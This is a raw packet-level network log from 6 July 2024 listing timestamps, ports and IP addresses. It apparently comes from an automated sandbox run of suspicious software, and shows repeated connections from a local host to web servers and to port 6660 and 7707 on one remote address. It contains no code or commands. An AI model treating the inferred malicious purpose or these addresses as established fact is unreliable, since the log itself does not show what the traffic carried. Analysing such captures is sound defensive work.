                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.517616034 CEST4983780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.524564981 CEST8049837208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.524633884 CEST4983780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.524842024 CEST4983780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.529526949 CEST8049837208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.996701956 CEST8049837208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:14.997073889 CEST4983780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.002165079 CEST8049837208.95.112.1192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.003282070 CEST4983780192.168.2.4208.95.112.1
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.050468922 CEST8049836188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.051244020 CEST8049836188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.051306009 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054088116 CEST4983680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054338932 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054373980 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054480076 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054838896 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.054853916 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.159341097 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.164190054 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.166008949 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.166063070 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.170783997 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.173758984 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.178487062 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.530296087 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.534976959 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.535001040 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.674607992 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.674662113 CEST44349838104.26.13.205192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.674966097 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.676346064 CEST49838443192.168.2.4104.26.13.205
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980057001 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980073929 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980086088 CEST8049839188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980123043 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.980158091 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:15.984638929 CEST4983980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.097021103 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.101877928 CEST8049840188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.101962090 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.102128029 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.105416059 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.105454922 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.105771065 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.106117010 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.106132030 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.106890917 CEST8049840188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.106971979 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.111782074 CEST8049840188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.723897934 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.723967075 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.727150917 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.727159023 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.727432966 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.730072021 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.730110884 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.821794033 CEST8049840188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.825100899 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.825536966 CEST8049840188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:16.825594902 CEST4984080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.026365042 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.027945995 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.027987957 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028110981 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028151035 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028290033 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028331995 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028440952 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028460026 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028652906 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028661966 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028676033 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028681040 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028707027 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028707027 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028714895 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028723001 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028847933 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028858900 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028876066 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028882980 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028898001 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028904915 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028922081 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.028930902 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029264927 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029273033 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029284000 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029295921 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029314995 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029321909 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029336929 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029342890 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029351950 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029357910 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029376984 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029381037 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029388905 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029395103 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029464006 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029470921 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029479027 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029484987 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029500961 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029500961 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029506922 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029514074 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029524088 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029530048 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029726028 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029736042 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029758930 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029758930 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029788971 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029803991 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029814005 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029911995 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.029927015 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030013084 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030019999 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030042887 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030081034 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030160904 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030201912 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030244112 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030253887 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030276060 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030508041 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030550957 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030560970 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030575037 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.030600071 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.039298058 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.042205095 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.042218924 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.059375048 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.059387922 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.059401989 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.059407949 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.060240030 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.065993071 CEST8049842188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.068609953 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.072931051 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.080471039 CEST8049842188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.080514908 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.085560083 CEST8049842188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.813174963 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.813252926 CEST44349841149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.814522028 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.815205097 CEST49841443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.817667007 CEST8049842188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.818980932 CEST8049842188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.819053888 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.823968887 CEST4984280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.938822985 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.943783998 CEST8049843188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.944020033 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.944094896 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.949124098 CEST8049843188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.949173927 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:17.954054117 CEST8049843188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.409015894 CEST498316660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.409696102 CEST498446660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.413865089 CEST66604983194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.414427042 CEST66604984494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.414506912 CEST498446660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.415153980 CEST498446660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.420726061 CEST66604984494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.768424988 CEST8049843188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.769587040 CEST8049843188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.769638062 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.773179054 CEST4984380192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.880016088 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.885644913 CEST8049845188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.885718107 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.885767937 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.890639067 CEST8049845188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.890686035 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:18.895587921 CEST8049845188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.600984097 CEST8049845188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.601054907 CEST8049845188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.601113081 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.622816086 CEST4984580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.786082029 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.790932894 CEST8049846188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.791013956 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.823570013 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.828341961 CEST8049846188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.828388929 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:19.833261013 CEST8049846188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.078535080 CEST66604984494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.079772949 CEST498446660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.561506987 CEST8049846188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.561759949 CEST8049846188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.561841011 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.567049026 CEST4984680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.697001934 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.701956987 CEST8049847188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.702024937 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.702090025 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.706840992 CEST8049847188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.706885099 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:20.711636066 CEST8049847188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.406790018 CEST8049847188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.407067060 CEST8049847188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.407114029 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.412734032 CEST4984780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.519092083 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.524056911 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.524131060 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.524236917 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.528991938 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.529037952 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:21.533896923 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.393238068 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.393451929 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.393461943 CEST8049848188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.395842075 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.404922962 CEST4984880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.519736052 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.524609089 CEST8049849188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.525888920 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.525957108 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.530721903 CEST8049849188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.531734943 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:22.538048029 CEST8049849188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.797530890 CEST8049849188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.798049927 CEST8049849188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.798240900 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.805078030 CEST4984980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.909410954 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.914266109 CEST8049850188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.914350033 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.914511919 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.919419050 CEST8049850188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.919540882 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:23.924366951 CEST8049850188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.676249981 CEST8049850188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.677126884 CEST8049850188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.677177906 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.681629896 CEST4985080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.796848059 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.801824093 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.801914930 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.804114103 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.809088945 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.809154034 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:24.813960075 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.096430063 CEST498446660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.096734047 CEST498526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.101411104 CEST66604984494.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.101593971 CEST66604985294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.101661921 CEST498526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.101984024 CEST498526660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.107094049 CEST66604985294.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.260617971 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.557785988 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.557966948 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.557977915 CEST8049851188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.558018923 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.559029102 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.559078932 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.563420057 CEST4985180192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.564017057 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.675051928 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.680509090 CEST8049854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.683794022 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.683913946 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.690013885 CEST8049854188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.690489054 CEST4985480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:25.695700884 CEST8049854188.114.96.3192.168.2.4
